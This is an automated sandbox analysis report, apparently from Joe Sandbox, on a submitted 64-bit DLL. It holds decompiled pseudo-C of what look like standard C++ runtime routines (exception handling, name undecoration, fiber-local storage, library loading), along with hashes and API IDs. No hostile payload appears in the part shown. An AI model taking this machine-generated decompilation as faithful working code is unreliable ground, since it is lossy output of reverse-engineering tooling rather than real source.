                                                                      				E0000000118000E0F4(_t241);
                                                                      				if ( *((long long*)(_t241 + 0x20)) == 0) goto 0x80010d1f;
                                                                      				E0000000118000E0F4(_t241);
                                                                      				_t255 =  *((intOrPtr*)(_t241 + 0x20));
                                                                      				E0000000118000E0F4(_t241);
                                                                      				 *((char*)(_t294 + 0x60)) = 1;
                                                                      				E0000000118000F21C(_t241,  *((intOrPtr*)(_t255 + 0x38)));
                                                                      				if ( *_t255 != 0xe06d7363) goto 0x800109f9;
                                                                      				if ( *((intOrPtr*)(_t255 + 0x18)) != 4) goto 0x800109f9;
                                                                      				if ( *((intOrPtr*)(_t255 + 0x20)) - 0x19930520 - 2 > 0) goto 0x800109f9;
                                                                      				if ( *((long long*)(_t255 + 0x30)) == 0) goto 0x80010d81;
                                                                      				E0000000118000E0F4(_t241);
                                                                      				if ( *(_t241 + 0x38) == 0) goto 0x80010a41;
                                                                      				E0000000118000E0F4(_t241);
                                                                      				E0000000118000E0F4(_t241);
                                                                      				 *(_t241 + 0x38) =  *(_t241 + 0x38) & 0x00000000;
                                                                      				if (E00000001180012A90(_t241, _t255, _t255,  *(_t241 + 0x38), __r9) != 0) goto 0x80010a3c;
                                                                      				if (E00000001180012B80(_t241, _t255,  *(_t241 + 0x38), __r9, _t292) == 0) goto 0x80010d63;
                                                                      				goto 0x80010d3f;
                                                                      				E00000001180011A88(_t292 - 0x10, _t316,  *((intOrPtr*)(__r9 + 8)));
                                                                      				if ( *_t255 != 0xe06d7363) goto 0x80010cd7;
                                                                      				if ( *((intOrPtr*)(_t255 + 0x18)) != 4) goto 0x80010cd7;
                                                                      				if ( *((intOrPtr*)(_t255 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80010cd7;
                                                                      				if ( *((intOrPtr*)(_t292 - 0x10)) <= 0) goto 0x80010cbc;
                                                                      				 *((intOrPtr*)(_t294 + 0x28)) =  *((intOrPtr*)(_t292 + 0x100));
                                                                      				 *(_t294 + 0x20) = _t316;
                                                                      				r8d = _t200;
                                                                      				_t157 = E0000000118000EB9C(_t255, _t292 - 0x58, _t292 - 0x10, _t290, _t291, _t292);
                                                                      				asm("movups xmm0, [ebp-0x58]");
                                                                      				asm("movdqu [ebp-0x78], xmm0");
                                                                      				asm("psrldq xmm0, 0x8");
                                                                      				asm("movd eax, xmm0");
                                                                      				if (_t157 -  *((intOrPtr*)(_t292 - 0x40)) >= 0) goto 0x80010cbc;
                                                                      				_t158 =  *((intOrPtr*)(_t292 - 0x70));
                                                                      				 *((long long*)(_t292 - 0x80)) =  *((intOrPtr*)(_t292 - 0x58));
                                                                      				 *((intOrPtr*)(_t294 + 0x68)) = _t158;
                                                                      				asm("inc ecx");
                                                                      				asm("dec ax");
                                                                      				asm("movups [ebp-0x78], xmm0");
                                                                      				if (_t158 - _t200 > 0) goto 0x80010c17;
                                                                      				if (_t200 - _t158 > 0) goto 0x80010c17;
                                                                      				_t243 =  *((intOrPtr*)(_t291 + 0x10));
                                                                      				r9d =  *_t243;
                                                                      				E000000011800119E0(_t243, _t292 + 0x20, _t292 - 0x78,  *((intOrPtr*)(_t291 + 8)));
                                                                      				_t160 =  *((intOrPtr*)(_t292 + 0x20));
                                                                      				r12d = 0;
                                                                      				 *((intOrPtr*)(_t294 + 0x64)) = r12d;
                                                                      				 *((intOrPtr*)(_t294 + 0x6c)) = _t160;
                                                                      				if (_t160 == 0) goto 0x80010c17;
                                                                      				asm("movups xmm0, [ebp+0x38]");
                                                                      				asm("movups xmm1, [ebp+0x48]");
                                                                      				asm("movups [ebp-0x38], xmm0");
                                                                      				asm("movsd xmm0, [ebp+0x58]");
                                                                      				asm("movsd [ebp-0x18], xmm0");
                                                                      				asm("movups [ebp-0x28], xmm1");
                                                                      				E0000000118000F1F0(_t243);
                                                                      				_t245 = _t243 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x30)) + 0xc));
                                                                      				 *((long long*)(_t294 + 0x70)) = _t245;
                                                                      				E0000000118000F1F0(_t245);
                                                                      				r15d =  *((intOrPtr*)(_t245 +  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x30)) + 0xc))));
                                                                      				if (r15d <= 0) goto 0x80010ba2;
                                                                      				E0000000118000F1F0(_t245);
                                                                      				_t313 = _t245 +  *((intOrPtr*)( *((intOrPtr*)(_t294 + 0x70))));
                                                                      				if (E000000011800113D0(_t201, _t255, _t292 - 0x38, _t313, _t290, _t291,  *((intOrPtr*)(_t255 + 0x30))) != 0) goto 0x80010bbf;
                                                                      				 *((long long*)(_t294 + 0x70)) =  *((long long*)(_t294 + 0x70)) + 4;
                                                                      				r15d = r15d - 1;
                                                                      				if (r15d > 0) goto 0x80010b68;
                                                                      				r12d =  *((intOrPtr*)(_t294 + 0x64));
                                                                      				E000000011800122A4( *((intOrPtr*)(_t294 + 0x70)), _t292 + 0x20);
                                                                      				r12d = r12d + 1;
                                                                      				 *((intOrPtr*)(_t294 + 0x64)) = r12d;
                                                                      				if (r12d ==  *((intOrPtr*)(_t294 + 0x6c))) goto 0x80010c13;
                                                                      				goto 0x80010b1f;
                                                                      				 *((char*)(_t294 + 0x58)) =  *((intOrPtr*)(_t292 + 0xf8));
                                                                      				_t269 = _t255;
                                                                      				 *((char*)(_t294 + 0x50)) =  *((intOrPtr*)(_t294 + 0x60));
                                                                      				 *((long long*)(_t294 + 0x48)) =  *((intOrPtr*)(_t292 - 0x60));
                                                                      				 *((intOrPtr*)(_t294 + 0x40)) =  *((intOrPtr*)(_t292 + 0x100));
                                                                      				 *((long long*)(_t294 + 0x38)) = _t292 - 0x78;
                                                                      				 *((long long*)(_t294 + 0x30)) = _t313;
                                                                      				 *((long long*)(_t294 + 0x28)) = _t292 - 0x38;
                                                                      				 *(_t294 + 0x20) = _t316;
                                                                      				E000000011800102F0(_t257[0x18005f7c0], _t255, _t269,  *((intOrPtr*)(_t294 + 0x78)),  *((intOrPtr*)(_t241 + 0x28)), _t291);
                                                                      				_t321 =  *((intOrPtr*)(_t292 - 0x80));
                                                                      				_t303 =  *((intOrPtr*)(_t321 + 8)) -  *((char*)(_t269 + 0x18005f7b0));
                                                                      				 *((long long*)(_t321 + 8)) = _t303;
                                                                      				 *(_t321 + 0x18) =  *(_t303 - 4) >>  *(_t269 + 0x18005f7c0);
                                                                      				_t304 = _t303 -  *((char*)(_t269 + 0x18005f7b0));
                                                                      				 *((long long*)(_t321 + 8)) = _t304;
                                                                      				 *(_t321 + 0x1c) =  *(_t304 - 4) >>  *(_t269 + 0x18005f7c0);
                                                                      				_t305 = _t304 -  *((char*)(_t269 + 0x18005f7b0));
                                                                      				 *(_t321 + 0x20) =  *(_t305 - 4) >>  *(_t269 + 0x18005f7c0);
                                                                      				_t195 =  *((intOrPtr*)(_t294 + 0x68)) + 1;
                                                                      				 *((long long*)(_t321 + 8)) = _t305;
                                                                      				_t116 = _t305 + 4; // 0x4
                                                                      				_t253 = _t116;
                                                                      				 *((long long*)(_t321 + 8)) = _t253;
                                                                      				 *((intOrPtr*)(_t321 + 0x24)) =  *_t305;
                                                                      				 *((intOrPtr*)(_t294 + 0x68)) = _t195;
                                                                      				if (_t195 -  *((intOrPtr*)(_t292 - 0x40)) < 0) goto 0x80010ace;
                                                                      				if (( *_t316 & 0x00000040) == 0) goto 0x80010d13;
                                                                      				if (E0000000118000E8CC(_t316) == 0) goto 0x80010d69;
                                                                      				goto 0x80010d13;
                                                                      				if ( *((intOrPtr*)(_t292 - 0x10)) <= 0) goto 0x80010d13;
                                                                      				if ( *((char*)(_t292 + 0xf8)) != 0) goto 0x80010d81;
                                                                      				 *((long long*)(_t294 + 0x38)) = _t313;
                                                                      				 *((intOrPtr*)(_t294 + 0x30)) =  *((intOrPtr*)(_t292 + 0x100));
                                                                      				 *((intOrPtr*)(_t294 + 0x28)) = _t200;
                                                                      				 *(_t294 + 0x20) = _t316;
                                                                      				E00000001180010FA0( *_t305, _t255, _t321,  *((intOrPtr*)(_t241 + 0x28)), _t291);
                                                                      				_t179 = E0000000118000E0F4(_t253);
                                                                      				if ( *((long long*)(_t253 + 0x38)) != 0) goto 0x80010d81;
                                                                      				return E000000011800028F0(_t179, _t195,  *(_t292 + 0x70) ^ _t294);
                                                                      			}


































                                                                      0x180010899
                                                                      0x1800108a1
                                                                      0x1800108a8
                                                                      0x1800108af
                                                                      0x1800108b2
                                                                      0x1800108b6
                                                                      0x1800108ca
                                                                      0x1800108cf
                                                                      0x1800108d5
                                                                      0x1800108d9
                                                                      0x1800108dc
                                                                      0x1800108e4
                                                                      0x1800108ef
                                                                      0x1800108f1
                                                                      0x1800108fa
                                                                      0x180010906
                                                                      0x180010908
                                                                      0x180010911
                                                                      0x180010913
                                                                      0x180010918
                                                                      0x18001091b
                                                                      0x180010920
                                                                      0x18001092a
                                                                      0x18001093c
                                                                      0x18001094c
                                                                      0x180010965
                                                                      0x18001096b
                                                                      0x180010977
                                                                      0x180010981
                                                                      0x180010992
                                                                      0x18001099d
                                                                      0x1800109a3
                                                                      0x1800109ad
                                                                      0x1800109b3
                                                                      0x1800109b8
                                                                      0x1800109bc
                                                                      0x1800109c5
                                                                      0x1800109ce
                                                                      0x1800109d9
                                                                      0x1800109df
                                                                      0x1800109ec
                                                                      0x1800109f3
                                                                      0x1800109f9
                                                                      0x180010a03
                                                                      0x180010a05
                                                                      0x180010a0e
                                                                      0x180010a19
                                                                      0x180010a25
                                                                      0x180010a31
                                                                      0x180010a37
                                                                      0x180010a4c
                                                                      0x180010a57
                                                                      0x180010a61
                                                                      0x180010a72
                                                                      0x180010a7c
                                                                      0x180010a8c
                                                                      0x180010a97
                                                                      0x180010a9c
                                                                      0x180010a9f
                                                                      0x180010aa4
                                                                      0x180010aa8
                                                                      0x180010aad
                                                                      0x180010ab2
                                                                      0x180010ab9
                                                                      0x180010ac3
                                                                      0x180010ac6
                                                                      0x180010aca
                                                                      0x180010ace
                                                                      0x180010ad3
                                                                      0x180010ad8
                                                                      0x180010ade
                                                                      0x180010aea
                                                                      0x180010af0
                                                                      0x180010b00
                                                                      0x180010b03
                                                                      0x180010b08
                                                                      0x180010b0b
                                                                      0x180010b0e
                                                                      0x180010b13
                                                                      0x180010b19
                                                                      0x180010b1f
                                                                      0x180010b23
                                                                      0x180010b27
                                                                      0x180010b2b
                                                                      0x180010b30
                                                                      0x180010b35
                                                                      0x180010b39
                                                                      0x180010b4a
                                                                      0x180010b4d
                                                                      0x180010b52
                                                                      0x180010b5f
                                                                      0x180010b66
                                                                      0x180010b68
                                                                      0x180010b7c
                                                                      0x180010b8d
                                                                      0x180010b8f
                                                                      0x180010b95
                                                                      0x180010b9b
                                                                      0x180010b9d
                                                                      0x180010ba6
                                                                      0x180010bab
                                                                      0x180010bae
                                                                      0x180010bb8
                                                                      0x180010bba
                                                                      0x180010bd0
                                                                      0x180010bd4
                                                                      0x180010bdb
                                                                      0x180010be3
                                                                      0x180010bee
                                                                      0x180010bf6
                                                                      0x180010bff
                                                                      0x180010c04
                                                                      0x180010c09
                                                                      0x180010c0e
                                                                      0x180010c13
                                                                      0x180010c39
                                                                      0x180010c42
                                                                      0x180010c46
                                                                      0x180010c61
                                                                      0x180010c6a
                                                                      0x180010c6e
                                                                      0x180010c89
                                                                      0x180010c96
                                                                      0x180010c9a
                                                                      0x180010c9c
                                                                      0x180010ca0
                                                                      0x180010ca0
                                                                      0x180010ca7
                                                                      0x180010cab
                                                                      0x180010caf
                                                                      0x180010cb6
                                                                      0x180010cc0
                                                                      0x180010ccf
                                                                      0x180010cd5
                                                                      0x180010cdb
                                                                      0x180010ce4
                                                                      0x180010cf3
                                                                      0x180010cfb
                                                                      0x180010d02
                                                                      0x180010d09
                                                                      0x180010d0e
                                                                      0x180010d13
                                                                      0x180010d1d
                                                                      0x180010d3e

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 3523768491-393685449
                                                                      • Opcode ID: 17c3c5d3a4765e50826e8cd48088b8634263427cdc0f4d9d977d1f04e9d222ad
                                                                      • Instruction ID: ffa1068e39424c2b3d8ce22294ed4230536d233261888c7350d378388e4547db
                                                                      • Opcode Fuzzy Hash: 17c3c5d3a4765e50826e8cd48088b8634263427cdc0f4d9d977d1f04e9d222ad
                                                                      • Instruction Fuzzy Hash: FCE1B273604B888AE7A2DF74D4803ED7BA0F349788F248215EE8857B96DF74C689C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 000000018003D177
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 000000018003D1AD
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 000000018003D1DA
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 000000018003D1EB
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 000000018003D1FC
                                                                      • SetLastError.KERNEL32(?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 000000018003D217
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: ac1a49fbfa827236b2cde6565bf2c6c61bcef898428b56ef635a6391f0513caa
                                                                      • Instruction ID: 95d5e4ceb0f396c436efd02835e24f4033335e728ed31340f2e6177d50ffdaa0
                                                                      • Opcode Fuzzy Hash: ac1a49fbfa827236b2cde6565bf2c6c61bcef898428b56ef635a6391f0513caa
                                                                      • Instruction Fuzzy Hash: BE11843030164C42FAEBA77565813FA53516B8C7F4F56C716B836477C7DE28C6498300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 61%
                                                                      			E0000000118000AD48(void* __edx, void* __edi, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, void* __rsi, long long __r8, void* __r14, void* __r15, long long _a8, long long _a16) {
                                                                      				intOrPtr _v16;
                                                                      				char _v24;
                                                                      				intOrPtr _v32;
                                                                      				char _v40;
                                                                      				intOrPtr _t21;
                                                                      				char _t23;
                                                                      				void* _t26;
                                                                      				char _t28;
                                                                      				void* _t33;
                                                                      				void* _t38;
                                                                      				char* _t46;
                                                                      				long long _t50;
                                                                      				char* _t52;
                                                                      				intOrPtr* _t55;
                                                                      				long long _t62;
                                                                      
                                                                      				_t62 = __r8;
                                                                      				_t57 = __rsi;
                                                                      				_t33 = __rax;
                                                                      				_t27 = __edi;
                                                                      				_t26 = __edx;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rdi;
                                                                      				r8d = 0;
                                                                      				_t55 = __rdx;
                                                                      				_t46 =  *0x80071308; // 0x0
                                                                      				_t38 = __rcx;
                                                                      				_v40 = __r8;
                                                                      				_v32 = r8d;
                                                                      				_t23 =  *_t46;
                                                                      				_t28 = _t23;
                                                                      				if (_t28 == 0) goto 0x8000ae0f;
                                                                      				if (_t28 == 0) goto 0x8000ae00;
                                                                      				if (_t28 == 0) goto 0x8000adcd;
                                                                      				if (_t23 - 7 == 1) goto 0x8000ad9c;
                                                                      				E00000001180007BF0(__edi, __rcx, __rcx, __rdx, __rdx, __rsi, __r14, __r15);
                                                                      				goto 0x8000ae2d;
                                                                      				if ( *_t55 == _t62) goto 0x8000adb4;
                                                                      				r8d = 9;
                                                                      				goto 0x8000adc1;
                                                                      				r8d = 8;
                                                                      				E00000001180005714(_t33, _t38,  &_v40, "volatile", _t55, __rsi);
                                                                      				_t50 =  *0x80071308; // 0x0
                                                                      				r9d = 2;
                                                                      				_v24 =  *_t55;
                                                                      				asm("bts eax, 0x8");
                                                                      				 *0x80071308 = _t50 + 1;
                                                                      				_t52 =  &_v40;
                                                                      				_v16 =  *((intOrPtr*)(_t55 + 8));
                                                                      				E0000000118000B1C8(_t26, _t27, _t38, _t38, _t52, _t55, _t57,  &_v24);
                                                                      				goto 0x8000ae2d;
                                                                      				_t21 =  *((intOrPtr*)(_t52 + 1));
                                                                      				if (_t21 == 0x24) goto 0x8000ae40;
                                                                      				if (_t21 != 0) goto 0x8000af3e;
                                                                      				_v16 = r8d;
                                                                      				_v24 = 0x8005f780;
                                                                      				return E00000001180005F48( &_v24, _t38, _t55);
                                                                      			}


















                                                                      0x18000ad48
                                                                      0x18000ad48
                                                                      0x18000ad48
                                                                      0x18000ad48
                                                                      0x18000ad48
                                                                      0x18000ad48
                                                                      0x18000ad4d
                                                                      0x18000ad5a
                                                                      0x18000ad5d
                                                                      0x18000ad60
                                                                      0x18000ad67
                                                                      0x18000ad6a
                                                                      0x18000ad6e
                                                                      0x18000ad72
                                                                      0x18000ad75
                                                                      0x18000ad77
                                                                      0x18000ad80
                                                                      0x18000ad85
                                                                      0x18000ad8a
                                                                      0x18000ad92
                                                                      0x18000ad97
                                                                      0x18000ada3
                                                                      0x18000ada5
                                                                      0x18000adb2
                                                                      0x18000adb4
                                                                      0x18000adc1
                                                                      0x18000adc6
                                                                      0x18000adcd
                                                                      0x18000adda
                                                                      0x18000ade7
                                                                      0x18000adeb
                                                                      0x18000adf2
                                                                      0x18000adf6
                                                                      0x18000adf9
                                                                      0x18000adfe
                                                                      0x18000ae00
                                                                      0x18000ae05
                                                                      0x18000ae09
                                                                      0x18000ae16
                                                                      0x18000ae1a
                                                                      0x18000ae3f

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                      • API String ID: 2943138195-757766384
                                                                      • Opcode ID: d7102d268205a3051dce0296ed17165e122f3928336c0fb775b07ef3e211eede
                                                                      • Instruction ID: 540a8241286d6388e21660baafdc136502b0263646abc12b3d3d1da7efe147e0
                                                                      • Opcode Fuzzy Hash: d7102d268205a3051dce0296ed17165e122f3928336c0fb775b07ef3e211eede
                                                                      • Instruction Fuzzy Hash: 097139B2608B4888FB96CB68D8913EC77A5B70E7C5F54C526EA4A53B95DF39C358C300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E0000000118000CA30(void* __edx, void* __edi, long long __rbx, void* __rcx, long long __rdi, void* __rsi, void* __r8, void* __r10, void* __r11, void* __r14, void* __r15, long long _a16, long long _a24) {
                                                                      				void* _v8;
                                                                      				signed int _v24;
                                                                      				char _v25;
                                                                      				char _v40;
                                                                      				char _v56;
                                                                      				intOrPtr _v64;
                                                                      				char _v72;
                                                                      				signed int _v80;
                                                                      				signed long long _v88;
                                                                      				void* _t35;
                                                                      				intOrPtr _t43;
                                                                      				void* _t45;
                                                                      				void* _t46;
                                                                      				signed long long _t54;
                                                                      				intOrPtr* _t56;
                                                                      				void* _t65;
                                                                      				intOrPtr* _t70;
                                                                      				intOrPtr _t87;
                                                                      				intOrPtr _t88;
                                                                      				void* _t92;
                                                                      
                                                                      				_t46 = __edi;
                                                                      				_t45 = __edx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rdi;
                                                                      				_t54 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v24 = _t54 ^ _t92 - 0x00000070;
                                                                      				_t56 =  *0x80071308; // 0x0
                                                                      				_t65 = __rcx;
                                                                      				_t43 =  *_t56;
                                                                      				if (_t43 != 0x58) goto 0x8000ca97;
                                                                      				_v64 = 4;
                                                                      				 *0x80071308 = _t56 + 1;
                                                                      				_v72 = "void";
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x50], xmm0");
                                                                      				E000000011800059CC("void", __rcx,  &_v88);
                                                                      				goto 0x8000cb76;
                                                                      				if (_t43 != 0x3f) goto 0x8000cb61;
                                                                      				E0000000118000BBA8(__rcx,  &_v72,  &_v88, __rsi, __r8, __r10, __r11, __r14);
                                                                      				if (( *0x80071318 & 0x00004000) == 0) goto 0x8000cb18;
                                                                      				_t87 =  *0x80071320; // 0x0
                                                                      				if (_t87 == 0) goto 0x8000cb18;
                                                                      				_t70 = _v72;
                                                                      				if (_t70 == 0) goto 0x8000caeb;
                                                                      				 *0x8005d348();
                                                                      				 *((char*)( *((intOrPtr*)( *_t70 + 0x18)))) = 0;
                                                                      				_t88 =  *0x80071320; // 0x0
                                                                      				goto 0x8000caef;
                                                                      				_v40 = 0;
                                                                      				_t35 = E00000001180039A54( *((intOrPtr*)( *_t70 + 0x18)), _t65,  &_v40, _t88, __rsi,  &_v25, __r10);
                                                                      				 *0x8005d348();
                                                                      				if (_t88 == 0) goto 0x8000cb18;
                                                                      				r8d = 0;
                                                                      				E0000000118000543C(_t65, _t88);
                                                                      				goto 0x8000cb76;
                                                                      				_v80 = 0x13;
                                                                      				_v88 = "`template-parameter";
                                                                      				asm("movaps xmm0, [ebp-0x50]");
                                                                      				asm("movdqa [ebp-0x50], xmm0");
                                                                      				E000000011800059CC("`template-parameter",  &_v56,  &_v88);
                                                                      				E00000001180005F48("`template-parameter",  &_v88,  &_v72);
                                                                      				r8b = 0x27;
                                                                      				E00000001180005F74( &_v88, _t65);
                                                                      				goto 0x8000cb76;
                                                                      				_v88 = _v88 & 0x00000000;
                                                                      				_v80 = _v80 & 0x00000000;
                                                                      				return E000000011800028F0(E0000000118000AD48(_t45, _t46, "`template-parameter", _t65, _t65,  &_v88, _t88, __rsi,  &_v72, __r14, __r15), _t35, _v24 ^ _t92 - 0x00000070);
                                                                      			}























                                                                      0x18000ca30
                                                                      0x18000ca30
                                                                      0x18000ca30
                                                                      0x18000ca35
                                                                      0x18000ca42
                                                                      0x18000ca4c
                                                                      0x18000ca50
                                                                      0x18000ca57
                                                                      0x18000ca5a
                                                                      0x18000ca5f
                                                                      0x18000ca64
                                                                      0x18000ca6b
                                                                      0x18000ca80
                                                                      0x18000ca84
                                                                      0x18000ca88
                                                                      0x18000ca8d
                                                                      0x18000ca92
                                                                      0x18000ca9a
                                                                      0x18000caa4
                                                                      0x18000cab3
                                                                      0x18000cab5
                                                                      0x18000cabf
                                                                      0x18000cac1
                                                                      0x18000cac8
                                                                      0x18000cad9
                                                                      0x18000cadf
                                                                      0x18000cae2
                                                                      0x18000cae9
                                                                      0x18000caeb
                                                                      0x18000caf3
                                                                      0x18000cafd
                                                                      0x18000cb06
                                                                      0x18000cb08
                                                                      0x18000cb11
                                                                      0x18000cb16
                                                                      0x18000cb18
                                                                      0x18000cb26
                                                                      0x18000cb2e
                                                                      0x18000cb36
                                                                      0x18000cb3b
                                                                      0x18000cb4b
                                                                      0x18000cb50
                                                                      0x18000cb5a
                                                                      0x18000cb5f
                                                                      0x18000cb61
                                                                      0x18000cb6a
                                                                      0x18000cb96

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: NameName::
                                                                      • String ID: `template-parameter$void
                                                                      • API String ID: 1333004437-4057429177
                                                                      • Opcode ID: 9ee28ed97abbba7733d8bbc292c21813d4d4c456bed7cbd316de1a2b54edbc8b
                                                                      • Instruction ID: 29c290ce2aa814a05071f4664f227510971c123a34874c342b421052006a8231
                                                                      • Opcode Fuzzy Hash: 9ee28ed97abbba7733d8bbc292c21813d4d4c456bed7cbd316de1a2b54edbc8b
                                                                      • Instruction Fuzzy Hash: 48414A32700B5888FB82DBA4D8513ED33B1B74CBD8F948115EE4967B99DF788649C341
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                      • String ID: api-ms-
                                                                      • API String ID: 3813093105-2084034818
                                                                      • Opcode ID: e35dbd52aba7f64ad23ed207506ff470d1c61cb34e1a32a3bc4f3eeaefbbbb37
                                                                      • Instruction ID: 03c70b89eb85fde413d8faf1e06ee20dffbdbd482f4c0d73f085749b8cf3ebb1
                                                                      • Opcode Fuzzy Hash: e35dbd52aba7f64ad23ed207506ff470d1c61cb34e1a32a3bc4f3eeaefbbbb37
                                                                      • Instruction Fuzzy Hash: D5217431302E0891EEA6CB16A8003E97294BB4DBF1F598735BE3947BD0DF38D6899300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                      • String ID: api-ms-
                                                                      • API String ID: 3813093105-2084034818
                                                                      • Opcode ID: 475c58edfddfd9c9d2ffec819a6ca437ebfa5e36f994d03e35e10d097f2dfab3
                                                                      • Instruction ID: 90c4e875ec8ccdf405c49798b29c8ceff3efb1c6f3e4a0c61526ce892d418d43
